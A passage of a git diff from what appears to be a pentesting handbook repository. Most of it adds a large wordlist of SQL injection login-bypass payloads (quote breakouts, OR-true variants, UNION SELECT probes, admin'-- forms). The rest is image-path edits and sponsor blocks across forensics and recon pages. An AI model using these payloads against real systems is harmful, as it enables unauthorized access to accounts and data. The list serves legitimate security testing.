+" # +"/* +'-' +'&' +'^' +'*' +'=' +0'<'2 +"-" +"&" +"^" +"*" +"=" +0"<"2 + +') +") +')-- 2 +')/* +')# +")-- 2 +") # +")/* +')-(' +')&(' +')^(' +')*(' +')=(' +0')<('2 +")-(" +")&(" +")^(" +")*(" +")=(" +0")<("2 + +'-''-- 2 +'-''# +'-''/* +'&''-- 2 +'&''# +'&''/* +'^''-- 2 +'^''# +'^''/* +'*''-- 2 +'*''# +'*''/* +'=''-- 2 +'=''# +'=''/* +0'<'2'-- 2 +0'<'2'# +0'<'2'/* +"-""-- 2 +"-""# +"-""/* +"&""-- 2 +"&""# +"&""/* +"^""-- 2 +"^""# +"^""/* +"*""-- 2 +"*""# +"*""/* +"=""-- 2 +"=""# +"=""/* +0"<"2"-- 2 +0"<"2"# +0"<"2"/* + +')-''-- 2 +')-''# +')-''/* +')&''-- 2 +')&''# +')&''/* +')^''-- 2 +')^''# +')^''/* +')*''-- 2 +')*''# +')*''/* +')=''-- 2 +')=''# +')=''/* +0')<'2'-- 2 +0')<'2'# +0')<'2'/* +")-""-- 2 +")-""# +")-""/* +")&""-- 2 +")&""# +")&""/* +")^""-- 2 +")^""# +")^""/* +")*""-- 2 +")*""# +")*""/* +")=""-- 2 +")=""# +")=""/* +0")<"2-- 2 +0")<"2# +0")<"2/* + + +'oR'2 +'oR'2'-- 2 +'oR'2'# +'oR'2'/* +'oR'2'oR' +'oR(2)-- 2 +'oR(2)# +'oR(2)/* +'oR(2)oR' +'oR 2-- 2 +'oR 2# +'oR 2/* +'oR 2 oR' +'oR/**/2-- 2 +'oR/**/2# +'oR/**/2/* +'oR/**/2/**/oR' +"oR"2 +"oR"2"-- 2 +"oR"2"# +"oR"2"/* +"oR"2"oR" +"oR(2)-- 2 +"oR(2)# +"oR(2)/* +"oR(2)oR" +"oR 2-- 2 +"oR 2# +"oR 2/* +"oR 2 oR" +"oR/**/2-- 2 +"oR/**/2# +"oR/**/2/* +"oR/**/2/**/oR" + +'oR'2'='2 +'oR'2'='2'oR' +'oR'2'='2'-- 2 +'oR'2'='2'# +'oR'2'='2'/* +'oR'2'='2'oR' +'oR 2=2-- 2 +'oR 2=2# +'oR 2=2/* +'oR 2=2 oR' +'oR/**/2=2-- 2 +'oR/**/2=2# +'oR/**/2=2/* +'oR/**/2=2/**/oR' +'oR(2)=2-- 2 +'oR(2)=2# +'oR(2)=2/* +'oR(2)=2/* +'oR(2)=(2)oR' +'oR'2'='2' LimIT 1-- 2 +'oR'2'='2' LimIT 1# +'oR'2'='2' LimIT 1/* +'oR(2)=(2)LimIT(1)-- 2 +'oR(2)=(2)LimIT(1)# +'oR(2)=(2)LimIT(1)/* +"oR"2"="2 +"oR"2"="2"oR" +"oR"2"="2"-- 2 +"oR"2"="2"# +"oR"2"="2"/* +"oR"2"="2"oR" +"oR 2=2-- 2 +"oR 2=2# +"oR 2=2/* +"oR 2=2 oR" +"oR/**/2=2-- 2 +"oR/**/2=2# +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR(2)=2-- 2 +"oR(2)=2# +"oR(2)=2/* +"oR(2)=2/* +"oR(2)=(2)oR" +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1/* +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)/* + +'oR true-- 2 +'oR true# +'oR true/* +'oR true oR' +'oR(true)-- 2 +'oR(true)# +'oR(true)/* +'oR(true)oR' +'oR/**/true-- 2 +'oR/**/true# +'oR/**/true/* +'oR/**/true/**/oR' +"oR true-- 2 +"oR true# +"oR true/* +"oR true oR" +"oR(true)-- 2 +"oR(true)# +"oR(true)/* +"oR(true)oR" +"oR/**/true-- 2 +"oR/**/true# +"oR/**/true/* +"oR/**/true/**/oR" + +'oR'2'LiKE'2 +'oR'2'LiKE'2'-- 2 +'oR'2'LiKE'2'# +'oR'2'LiKE'2'/* +'oR'2'LiKE'2'oR' +'oR(2)LiKE(2)-- 2 +'oR(2)LiKE(2)# +'oR(2)LiKE(2)/* +'oR(2)LiKE(2)oR' +"oR"2"LiKE"2 +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)# +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" + +admin +admin'-- 2 +admin'# +admin'/* +admin"-- 2 +admin"# +ffifdyop + +' UniON SElecT 1,2-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +'UniON(SElecT(1),2)-- 2 +'UniON(SElecT(1),2,3)-- 2 +'UniON(SElecT(1),2,3,4)-- 2 +'UniON(SElecT(1),2,3,4,5)-- 2 +'UniON(SElecT(1),2)# +'UniON(SElecT(1),2,3)# +'UniON(SElecT(1),2,3,4)# +'UniON(SElecT(1),2,3,4,5)# +" UniON SElecT 1,2-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2# +" UniON SElecT 1,2,3# +" UniON SElecT 1,2,3,4# +" UniON SElecT 1,2,3,4,5# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)-- 2 +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4,5)# + +'||'2 +'||2-- 2 +'||'2'||' +'||2# +'||2/* +'||2||' +"||"2 +"||2-- 2 +"||"2"||" +"||2# +"||2/* +"||2||" +'||'2'='2 +'||'2'='2'||' +'||2=2-- 2 +'||2=2# +'||2=2/* +'||2=2||' +"||"2"="2 +"||"2"="2"||" +"||2=2-- 2 +"||2=2# +"||2=2/* +"||2=2||" +'||2=(2)LimIT(1)-- 2 +'||2=(2)LimIT(1)# +'||2=(2)LimIT(1)/* +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)/* +'||true-- 2 +'||true# +'||true/* +'||true||' +"||true-- 2 +"||true# +"||true/* +"||true||" +'||'2'LiKE'2 +'||'2'LiKE'2'-- 2 +'||'2'LiKE'2'# +'||'2'LiKE'2'/* +'||'2'LiKE'2'||' +'||(2)LiKE(2)-- 2 +'||(2)LiKE(2)# +'||(2)LiKE(2)/* +'||(2)LiKE(2)||' +"||"2"LiKE"2 +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"# +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)# +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" + +')oR('2 +')oR'2'-- 2 +')oR'2'# +')oR'2'/* +')oR'2'oR(' +')oR(2)-- 2 +')oR(2)# +')oR(2)/* +')oR(2)oR(' +')oR 2-- 2 +')oR 2# +')oR 2/* +')oR 2 oR(' +')oR/**/2-- 2 +')oR/**/2# +')oR/**/2/* +')oR/**/2/**/oR(' +")oR("2 +")oR"2"-- 2 +")oR"2"# +")oR"2"/* +")oR"2"oR(" +")oR(2)-- 2 +")oR(2)# +")oR(2)/* +")oR(2)oR(" +")oR 2-- 2 +")oR 2# +")oR 2/* +")oR 2 oR(" +")oR/**/2-- 2 +")oR/**/2# +")oR/**/2/* +")oR/**/2/**/oR(" +')oR'2'=('2 +')oR'2'='2'oR(' +')oR'2'='2'-- 2 +')oR'2'='2'# +')oR'2'='2'/* +')oR'2'='2'oR(' +')oR 2=2-- 2 +')oR 2=2# +')oR 2=2/* +')oR 2=2 oR(' +')oR/**/2=2-- 2 +')oR/**/2=2# +')oR/**/2=2/* +')oR/**/2=2/**/oR(' +')oR(2)=2-- 2 +')oR(2)=2# +')oR(2)=2/* +')oR(2)=2/* +')oR(2)=(2)oR(' +')oR'2'='2' LimIT 1-- 2 +')oR'2'='2' LimIT 1# +')oR'2'='2' LimIT 1/* +')oR(2)=(2)LimIT(1)-- 2 +')oR(2)=(2)LimIT(1)# +')oR(2)=(2)LimIT(1)/* +")oR"2"=("2 +")oR"2"="2"oR(" +")oR"2"="2"-- 2 +")oR"2"="2"# +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR 2=2-- 2 +")oR 2=2# +")oR 2=2/* +")oR 2=2 oR(" +")oR/**/2=2-- 2 +")oR/**/2=2# +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR(2)=2-- 2 +")oR(2)=2# +")oR(2)=2/* +")oR(2)=2/* +")oR(2)=(2)oR(" +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1/* +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)/* +')oR true-- 2 +')oR true# +')oR true/* +')oR true oR(' +')oR(true)-- 2 +')oR(true)# +')oR(true)/* +')oR(true)oR(' +')oR/**/true-- 2 +')oR/**/true# +')oR/**/true/* +')oR/**/true/**/oR(' +")oR true-- 2 +")oR true# +")oR true/* +")oR true oR(" +")oR(true)-- 2 +")oR(true)# +")oR(true)/* +")oR(true)oR(" +")oR/**/true-- 2 +")oR/**/true# +")oR/**/true/* +")oR/**/true/**/oR(" +')oR'2'LiKE('2 +')oR'2'LiKE'2'-- 2 +')oR'2'LiKE'2'# +')oR'2'LiKE'2'/* +')oR'2'LiKE'2'oR(' +')oR(2)LiKE(2)-- 2 +')oR(2)LiKE(2)# +')oR(2)LiKE(2)/* +')oR(2)LiKE(2)oR(' +")oR"2"LiKE("2 +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)# +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +admin')-- 2 +admin')# +admin')/* +admin")-- 2 +admin")# +') UniON SElecT 1,2-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +')UniON(SElecT(1),2)-- 2 +')UniON(SElecT(1),2,3)-- 2 +')UniON(SElecT(1),2,3,4)-- 2 +')UniON(SElecT(1),2,3,4,5)-- 2 +')UniON(SElecT(1),2)# +')UniON(SElecT(1),2,3)# +')UniON(SElecT(1),2,3,4)# +')UniON(SElecT(1),2,3,4,5)# +") UniON SElecT 1,2-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2# +") UniON SElecT 1,2,3# +") UniON SElecT 1,2,3,4# +") UniON SElecT 1,2,3,4,5# +")UniON(SElecT(1),2)-- 2 +")UniON(SElecT(1),2,3)-- 2 +")UniON(SElecT(1),2,3,4)-- 2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")UniON(SElecT(1),2)# +")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4,5)# +')||('2 +')||2-- 2 +')||'2'||(' +')||2# +')||2/* +')||2||(' +")||("2 +")||2-- 2 +")||"2"||(" +")||2# +")||2/* +")||2||(" +')||'2'=('2 +')||'2'='2'||(' +')||2=2-- 2 +')||2=2# +')||2=2/* +')||2=2||(' +")||"2"=("2 +")||"2"="2"||(" +")||2=2-- 2 +")||2=2# +")||2=2/* +")||2=2||(" +')||2=(2)LimIT(1)-- 2 +')||2=(2)LimIT(1)# +')||2=(2)LimIT(1)/* +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)/* +')||true-- 2 +')||true# +')||true/* +')||true||(' +")||true-- 2 +")||true# +")||true/* +")||true||(" +')||'2'LiKE('2 +')||'2'LiKE'2'-- 2 +')||'2'LiKE'2'# +')||'2'LiKE'2'/* +')||'2'LiKE'2'||(' +')||(2)LiKE(2)-- 2 +')||(2)LiKE(2)# +')||(2)LiKE(2)/* +')||(2)LiKE(2)||(' +")||"2"LiKE("2 +")||"2"LiKE"2"-- 2 +")||"2"LiKE"2"# +")||"2"LiKE"2"/* +")||"2"LiKE"2"||(" +")||(2)LiKE(2)-- 2 +")||(2)LiKE(2)# +")||(2)LiKE(2)/* +")||(2)LiKE(2)||(" +' UnION SELeCT 1,2` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3,4,5` \ No newline at end of file diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index 14cd962b6..340b75347 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -26,7 +26,7 @@ dht udp "DHT Nodes" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) InfluxDB diff --git a/README.md b/README.md index 3ab33f4ee..ee7790fba 100644 --- a/README.md +++ b/README.md @@ -58,7 +58,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ### [Intigriti](https://www.intigriti.com) -![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (10) (14).png>) +![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (14).png>) **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** @@ -77,7 +77,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ### [**INE**](https://ine.com) -![](<.gitbook/assets/INE\_Logo (3).jpg>) +![](.gitbook/assets/ine\_logo-3-.jpg) [**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.** diff --git a/SUMMARY.md b/SUMMARY.md index dc0296acb..d9bd40158 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -281,6 +281,7 @@ * [Code Review Tools](network-services-pentesting/pentesting-web/code-review-tools.md) * [Drupal](network-services-pentesting/pentesting-web/drupal.md) * [Flask](network-services-pentesting/pentesting-web/flask.md) + * [NodeJS Express](network-services-pentesting/pentesting-web/nodejs-express.md) * [Git](network-services-pentesting/pentesting-web/git.md) * [Golang](network-services-pentesting/pentesting-web/golang.md) * [GraphQL](network-services-pentesting/pentesting-web/graphql.md) diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md index f607af43d..ceacff72f 100644 --- a/cloud-security/atlantis.md +++ b/cloud-security/atlantis.md @@ -305,7 +305,7 @@ Moreover, if you don't have configured in the **branch protection** to ask to ** This is the **setting** in Github branch protections: -![](<../.gitbook/assets/image (307) (4).png>) +![](<../.gitbook/assets/image (375) (1) (1).png>) ### Webhook Secret diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md index d1148e329..38468315d 100644 --- a/cloud-security/concourse/concourse-architecture.md +++ b/cloud-security/concourse/concourse-architecture.md @@ -20,7 +20,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ## Architecture -![](<../../.gitbook/assets/image (307) (3) (1).png>) +![](<../../.gitbook/assets/image (651) (1) (1).png>) ### ATC: web UI & build scheduler diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md index 1ac4abc1c..570c00167 100644 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md @@ -35,7 +35,7 @@ Note that other cloud resources could be searched for and that some times these As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). -![](<../../.gitbook/assets/image (618).png>) +![](<../../.gitbook/assets/image (628) (1) (1) (1).png>) The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: diff --git a/ctf-write-ups/try-hack-me/pickle-rick.md b/ctf-write-ups/try-hack-me/pickle-rick.md index e12041fe2..18c4d9c6c 100644 --- a/ctf-write-ups/try-hack-me/pickle-rick.md +++ b/ctf-write-ups/try-hack-me/pickle-rick.md @@ -26,7 +26,7 @@ This machine was categorised as easy and it was pretty easy. I started **enumerating the machine using my tool** [**Legion**](https://github.com/carlospolop/legion): -![](<../../.gitbook/assets/image (79) (1).png>) +![](<../../.gitbook/assets/image (79) (2).png>) In as you can see 2 ports are open: 80 (**HTTP**) and 22 (**SSH**) diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 90e1fffbd..e79a2341a 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -405,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: @@ -474,7 +474,7 @@ For example, in the following situation there is a **local variable in the stack So, flag is in **0xffffcf4c** -![](<../../.gitbook/assets/image (622).png>) +![](<../../.gitbook/assets/image (618) (2).png>) And from the leak you can see the **pointer to the flag** is in the **8th** parameter: diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 8b1621fd2..25f03a6c4 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -65,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (3).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) An then use the following code diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md index 7b9a2f52e..79a415206 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md @@ -152,7 +152,7 @@ Some interesting attributes: * [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) (among others): * Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides. -![](<../../../.gitbook/assets/image (507) (1).png>) +![](<../../../.gitbook/assets/image (507) (1) (1).png>) ![](<../../../.gitbook/assets/image (509).png>) diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 9dfe72abf..a4c6c72de 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -78,7 +78,7 @@ This tool is also useful to get **other information analysed** from the packets You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**. -![](<../../../.gitbook/assets/image (567) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1).png>) ### [BruteShark](https://github.com/odedshimon/BruteShark) diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index b1ecd2323..0ae4024d0 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -101,7 +101,7 @@ You can add a column that show the Host HTTP header: And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**): -![](<../../../.gitbook/assets/image (408) (1).png>) +![](<../../../.gitbook/assets/image (408).png>) ## Identifying local hostnames diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 42e6ea5b2..964a160de 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -54,7 +54,7 @@ Having these files you can sue the tool [**Rifiuti**](https://github.com/abelche .\rifiuti-vista.exe C:\Users\student\Desktop\Recycle ``` -![](<../../../.gitbook/assets/image (495) (1) (1).png>) +![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>) ### Volume Shadow Copies @@ -152,7 +152,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>) ### USB Detective diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 16f8e04f5..c99c5d2ae 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -151,7 +151,7 @@ Within this registry it's possible to find: ![](<../../../.gitbook/assets/image (477).png>) -![](<../../../.gitbook/assets/image (479) (1) (1).png>) +![](<../../../.gitbook/assets/image (479) (1).png>) Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value @@ -171,7 +171,7 @@ Having the **{GUID}** of the device it's now possible to **check all the NTUDER. Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one (using the tool Registry Explorer). -![](<../../../.gitbook/assets/image (483) (1).png>) +![](<../../../.gitbook/assets/image (483) (1) (1).png>) ### Volume Serial Number diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md index 8476f8406..fdbf2e4fc 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -162,7 +162,7 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover. If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ _Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\ {% embed url="https://go.intigriti.com/hacktricks" %} @@ -388,7 +388,7 @@ There are several tools out there that will perform part of the proposed actions * **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)** {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index 11c6ce5cb..b2e0cd880 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -23,7 +23,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\ {% embed url="https://go.intigriti.com/hacktricks" %} @@ -31,7 +31,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) ## Pentesting Methodology -![](../.gitbook/assets/p2.png) +![](<../.gitbook/assets/p2 (1).png>) ### 0- Physical Attacks @@ -78,7 +78,7 @@ There are also several tools that can perform **automatic vulnerabilities assess In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.** {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\ {% embed url="https://go.intigriti.com/hacktricks" %} @@ -165,7 +165,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve * [**Padding Oracle**](../cryptography/padding-oracle-priv.md) {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/pentesting-network/README.md b/generic-methodologies-and-resources/pentesting-network/README.md index 56aa57db9..5f6f358cd 100644 --- a/generic-methodologies-and-resources/pentesting-network/README.md +++ b/generic-methodologies-and-resources/pentesting-network/README.md @@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) {% hint style="danger" %} -****\ +****\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -792,7 +792,7 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19 Bettercap broadcast WSD packets searching for services (UDP Port 3702). {% hint style="danger" %} -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 8654ff5db..3e1031078 100644 --- a/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -141,7 +141,7 @@ Responder is going to **impersonate all the service using the mentioned protocol It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS. -![](<../../.gitbook/assets/poison (1) (1) (1).jpg>) +![](<../../.gitbook/assets/poison (1) (1).jpg>) ## Inveigh @@ -179,7 +179,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex python MultiRelay.py -t -u ALL #If "ALL" then all users are relayed ``` -![](<../../.gitbook/assets/image (209).png>) +![](<../../.gitbook/assets/image (209) (1).png>) ### Post-Exploitation (MultiRelay) @@ -209,7 +209,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\ Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\ Locate the option “Turn off multicast name resolution” and click “policy setting”: -![](../../.gitbook/assets/1.jpg) +![](<../../.gitbook/assets/1 (1).jpg>) Once the new window opens, enable this option, press Apply and click OK: diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 